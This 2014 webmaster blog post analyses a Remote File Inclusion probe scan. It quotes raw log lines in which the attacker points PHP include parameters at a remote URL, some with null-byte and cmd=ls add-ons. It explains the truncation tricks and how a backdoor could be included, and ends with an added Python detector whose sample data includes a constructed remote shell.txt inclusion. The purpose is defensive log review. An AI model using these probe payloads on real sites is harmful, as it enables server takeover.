Massive server probe attack on 2/16/2014
February 16, 2014
As a concerned web site owner and webmaster I make it a routine to review my daily access logs. I am not only looking at who visited me and where they were referred from, but also at who was attacking my web site and what probes they were using.
On Sunday, February 16, 2014, I was reading the day's raw access log when I saw an enormous vulnerability probe attack, which encompassed an amazing 2189 individual hack attempts over 12 minutes and 11 seconds. The entire attack came from a compromised dedicated server at 208.115.221.18, which belongs to Limestone Networks and is sub-leased to a Panamanian citizen, who in turn leased the server at that IP address to a company named Towntek.com.
Upon checking out Towntek.com I was greeted by a "default website page," the placeholder that is displayed when web space has been leased but no content has been uploaded to the public web root and/or no index page has been published.
So, what we have here is yet another undeveloped web site on an unsecured web server that has been hacked and is being used to attack other web sites.
Fortunately for me (fortune favors the prepared mind), I made it a point to learn about common attack vectors used to take over web sites and have protected my web sites against the tactics employed by the remote attacker using 208.115.221.18. This attack is most likely part of a botnet that employs hacked web sites and servers to launch attacks against other web sites and individuals browsing them.
I have since notified Limestone Networks about the compromised account. The assigned owner of the hacked site left no contact information.
Excerpts of the attack are shown in my extended content.
Excerpts of the server attack targeting Wizcrafts.net, on 2/16/2014:
208.115.221.18 - - [16/Feb/2014:06:07:46 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:46 -0700] "GET /0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:46 -0700] "GET /123flashchat.php?e107path=http://www.google.com/humans.txt? HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:46 -0700] "GET /2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:46 -0700] "GET /22_ultimate/templates/header.php?mainpath=http://www.google.com/humans.txt? HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:47 -0700] "GET /=http://www.google.com/humans.txt? HTTP/1.1" 403 329 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:47 -0700] "GET /?_CONFIG[files][functions_page]=http://www.google.com/humans.txt? HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:47 -0700] "GET /?npage=-1&content_dir=http://www.google.com/humans.txt?%00&cmd=ls HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:47 -0700] "GET /?npage=1&content_dir=http://www.google.com/humans.txt?%00&cmd=ls HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:47 -0700] "GET /?show=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:47 -0700] "GET /A-Blog/navigation/donation.php?navigation_start=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
snip
208.115.221.18 - - [16/Feb/2014:06:19:38 -0700] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.google.com/humans.txt? HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:38 -0700] "GET /work/index.php?g_include=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:48 -0700] "GET /wp-cache-phase1.php?plugin=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:48 -0700] "GET /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:49 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:49 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:49 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:52 -0700] "GET /wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:52 -0700] "GET /wsk/wsk.php?wsk=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:52 -0700] "GET /xarg_corner.php?xarg=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /xarg_corner_bottom.php?xarg=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /xarg_corner_top.php?xarg=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.google.com/humans.txt?&2093085906=1&995617320=2 HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /xt_counter.php?server_base_dir=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /yabbse/Sources/Packages.php?sourcedir=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /yacs/scripts/update_trailer.php?context[path_to_root]=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /yrch/plugins/metasearch/plug.inc.php?path=http://www.google.com/humans.txt? HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:57 -0700] "GET /ytb/cuenta/cuerpo.php?base_archivo=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:57 -0700] "GET /zipndownload.php?PP_PATH=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:57 -0700] "GET /zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
The attack lasted over 12 minutes and encompassed 2189 individual lines in my access log. The targets were probed in alphabetical order, ending with items beginning with the letter Z. Every one was tested to see whether a PHP include-path parameter (mainpath, wpPATH, GALLERY_BASEDIR, libpath and the like) could be pointed at the remote file http://www.google.com/humans.txt. This type of attack is called a Remote File Inclusion (RFI) attack: if the targeted script hands that parameter to include() or require() unsanitized, and the server permits URL includes (allow_url_include, or allow_url_fopen on PHP versions before 5.2), PHP fetches the remote file and executes it as code. The scanner uses Google's harmless humans.txt as its test payload; a response that echoes the file's contents tells the attacker the site is exploitable, and a real backdoor can then be included the same way. Two details of the probes are worth recognizing in your own logs: the trailing "?" turns whatever the script appends to the path (for example "/config.php") into a query string on the remote server, and the %00 in the content_dir probes is a null byte meant to truncate that appended suffix on PHP versions before 5.3.4.
If you own or manage web sites, check your access logs for similar entries. Mine all gave either a 403, 405, or 406 server response, which means they were fended off. If you see such hack attempts and any of them drew a 200 response, the targeted script exists and ran. That does not by itself prove the inclusion succeeded, but it is the signal to investigate: read the script to see whether it passes the parameter to include() or require() without validation, compare the response size with that of a normal request, and confirm that allow_url_include is off in php.ini. If the include did work, assume the web server or web site has been hacked.
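As an added example (it is not part of the original post and is not the author's code), here is a small Python script that does the log review described above: it parses Apache combined-format lines, flags every query parameter whose value is a remote URL, notes the trailing-"?" and %00 tricks, and marks 200 responses for manual review. The first three sample lines are copied from the excerpt above; the 203.0.113.7 and 198.51.100.9 lines, the /gallery/init.php path and shell.txt file name are constructed for the demonstration and do not describe real traffic.

```python
"""Flag remote-file-inclusion (RFI) probes in an Apache access log.

An RFI probe sets a PHP include-path parameter (mainpath, wpPATH,
GALLERY_BASEDIR, ...) to a remote URL. This script reports each request whose
query string carries a URL-valued parameter, with the HTTP status, so that the
200 responses can be pulled out for manual review.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Schemes PHP's URL wrappers will fetch when allow_url_include is enabled.
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def rfi_indicators(target):
    """Return one record per query parameter whose decoded value is a remote URL.

    parse_qsl decodes %00 to a real null byte, so the record also says whether
    the probe carried the null-byte truncation trick; the trailing '?' stays
    visible in the reported URL.
    """
    parts = urlsplit(target)
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if REMOTE_URL.match(value):
            hits.append({
                "param": name,
                "url": value.replace("\x00", "%00"),
                "null_byte": "\x00" in value,
            })
    return hits


def scan_log(lines):
    """Scan log lines and return one finding per RFI probe, marking 200s for review."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        for hit in rfi_indicators(entry["target"]):
            findings.append({
                "host": entry["host"],
                "time": entry["time"],
                "script": urlsplit(entry["target"]).path,
                "status": entry["status"],
                # A 200 only proves the script ran; whether it really fetched and
                # executed the remote file must be confirmed by reading the script.
                "review": entry["status"] == 200,
                **hit,
            })
    return findings


# First three lines are taken from the log excerpt in the post. The last two are
# constructed: 203.0.113.7 / 198.51.100.9 are documentation addresses and
# /gallery/init.php and shell.txt are hypothetical.
SAMPLE_LOG = [
    '208.115.221.18 - - [16/Feb/2014:06:07:46 -0700] "GET /22_ultimate/templates/header.php?mainpath=http://www.google.com/humans.txt? HTTP/1.1" 406 426 "-" "-"',
    '208.115.221.18 - - [16/Feb/2014:06:07:47 -0700] "GET /?npage=-1&content_dir=http://www.google.com/humans.txt?%00&cmd=ls HTTP/1.1" 406 426 "-" "-"',
    '208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.google.com/humans.txt?&2093085906=1&995617320=2 HTTP/1.1" 405 788 "-" "-"',
    '203.0.113.7 - - [16/Feb/2014:07:02:10 -0700] "GET /gallery/init.php?basedir=http://203.0.113.7/shell.txt? HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [16/Feb/2014:07:05:00 -0700] "GET /index.php?page=about HTTP/1.1" 200 2044 "http://example.com/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        flag = "REVIEW" if f["review"] else "blocked"
        print(f'{flag:7} {f["status"]} {f["host"]} {f["script"]} {f["param"]}={f["url"]}'
              + (" (null byte)" if f["null_byte"] else ""))
```

To run it against a real log, replace SAMPLE_LOG with the lines of the file (for example `scan_log(open("access_log"))`). The normal /index.php?page=about request is not reported because its parameter value is a local name, not a URL; only the rows marked REVIEW need a human to open the script and check what it does with the parameter.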
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.